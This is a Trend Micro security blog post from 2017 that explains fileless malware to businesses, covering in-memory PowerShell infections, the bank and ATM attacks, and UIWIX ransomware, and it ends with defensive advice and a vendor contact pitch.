Fileless Malware: A Hidden Threat

Credit to Author: Trend Micro| Date: Mon, 23 Oct 2017 21:09:03 +0000

Fileless malware is a hidden threat that should concern businesses.

Malware is advancing at an unprecedented rate, with four new strains discovered every minute, Slate reported. This is already a lot for businesses to worry about and it doesn't even cover the other threats that haven't been detected. Many attackers have evolved their techniques to evade common security solutions in order to cause the most damage to an infected machine and get away with more information.

Legacy security solutions are already struggling to keep up with malware and sophisticated, fileless malware serves up even more of a risk for companies. Fileless malware has been used more recently to bypass traditional file scanning technology and lie undetected within infected machines. Although this type of strain might not be as well covered as other flashy strains, fileless malware is a hidden threat that should concern businesses.

What is fileless malware?

Legitimate operating systems and applications have a number of distinct vulnerabilities that attackers can exploit to infect hardware and get away with sensitive information. These gaps often aren't known about until damage has already been done – then it's a race against time to patch the openings and prevent similar instances. A fileless malware infection is one of the many techniques used to take advantage of process vulnerabilities – i.e., making the browser run malicious code, leveraging Microsoft Word macros or using Microsoft's PowerShell utility – but is uniquely geared to fly under the radar. Fileless malware is written directly onto a computer's RAM through carefully crafted PowerShell scripts. According to TechRepublic contributor Jesus Vigo, once access is granted, PowerShell executes a hidden command against the system, which varies based on an attacker's intentions and length of time planned for the breach.

Fileless malware is written into code, making it hard to detect. Fileless malware is written into code, making it hard to detect.

One positive is that hackers don't know how long they'll have to carry out the attack since the system could be restarted at any time, halting the breach. However, threat actors have already been making preparations for these instances to ensure that fileless malware doesn't rely on the endpoints to sustain connectivity. Hackers will plant registry entries and set scripts to run even after the system restarts, ensuring that the attack can continue. These capabilities pose a real threat to businesses that aren't prepared for this type of sophistication.

Current security solutions detect an intrusion based on a signature based on the malware file's characteristics. However, because fileless malware doesn't have a payload file to infect a system, security applications don't know what to look for. In addition, this threat uses a system's own commands to execute the attack, which might not be considered in traffic and behavior monitoring efforts.

"These situations demonstrate how dangerous fileless malware is."

Examples of executed attacks

A number of big exploits have already been executed through fileless malware infections. These situations not only demonstrate how dangerous fileless malware is, but also provide lessons on what organizations should look for.

Banks lose to fileless attacks

Earlier this year, more than 100 banks and financial institutions were infected by a fileless malware attack, impacting organizations in over 40 countries. The Hacker News noted that this type of technique was never mainstream, until now, making it difficult for businesses to respond appropriately to the new threat. One bank's security team discovered the malware when they found a copy of Meterpreter in the physical memory of a Microsoft domain controller. This attack likely used PowerShell to load Meterpreter into memory rather than writing it to the disk, aiming to compromise computers that control ATMs. 

While the malware may have been stalled when it was initially discovered in February, a few months later, hackers had the last laugh. The Hacker News reported that at least eight ATMs in Russia were targeted by fileless malware, enabling the hackers to control the machines and steal $800,000. The affected banks couldn't find any trace of malware on the ATMs or backend network. Instead, it was discovered that two files of malware logs were on the ATM's hard drive. The malware was believed to have been installed and executed via remote administration modules.

fileless malwareThis attack likely used PowerShell to load Meterpreter into memory rather than writing it to the disk, aiming to compromise computers that control ATMs.

UIWIX takes a page from WannaCry

Shortly after WannaCry impacted thousands of businesses, other strains evolved to emulate its techniques. UIWIX ransomware uses the same vulnerabilities that WannaCry exploited, but UIWIX is fileless. According to a Trend Micro report, UIWIX opts to terminate itself if it detects a virtual machine or sandbox, allowing the strain to avoid detection and analysis. This strain is much more difficult to stop and remove from infected systems, and uses two algorithms for encryption.

Fortunately, there is a means to stop this malware from impacting your system. After WannaCry hit, critical patches were rolled out to eliminate this vulnerability. By updating systems with the necessary patches, organizations will be able to mitigate UIWIX and similar threats that exploit this security gap in the future. Even though it might take time to execute the changes, it's worth it to ensure your systems stay protected.

Detecting invisible risks

Navigating the changing threat landscape and tackling a sophisticated strain like fileless malware can be a daunting prospect to many organizations. However, there are a few things that leaders can do to protect themselves against invisible risks and better detect these evasive techniques. Trend Micro recommends applying the latest patches, implementing the principle of least privilege and enabling a custom sandbox. Organizations should also adopt best practices for securing and using PowerShell to scrutinize suspicious or malicious behaviors within a system. IT departments should also consider listing triggers for detection that could be based on commands within malicious PowerShell scripts. Monitoring behavior, securing possible points of entry and disabling unnecessary components will be essential for preventing fileless malware infections as well. 

Fileless malware reminds us of the direction that cyber threats are heading, the rising sophistication of emerging strains and how businesses are unprepared to handle these risks. Awareness around this technique can help leaders understand what to look for and how to keep themselves safe. For more information on fileless malware and how to protect your business, contact Trend Micro today.

http://feeds.trendmicro.com/TrendMicroSimplySecurity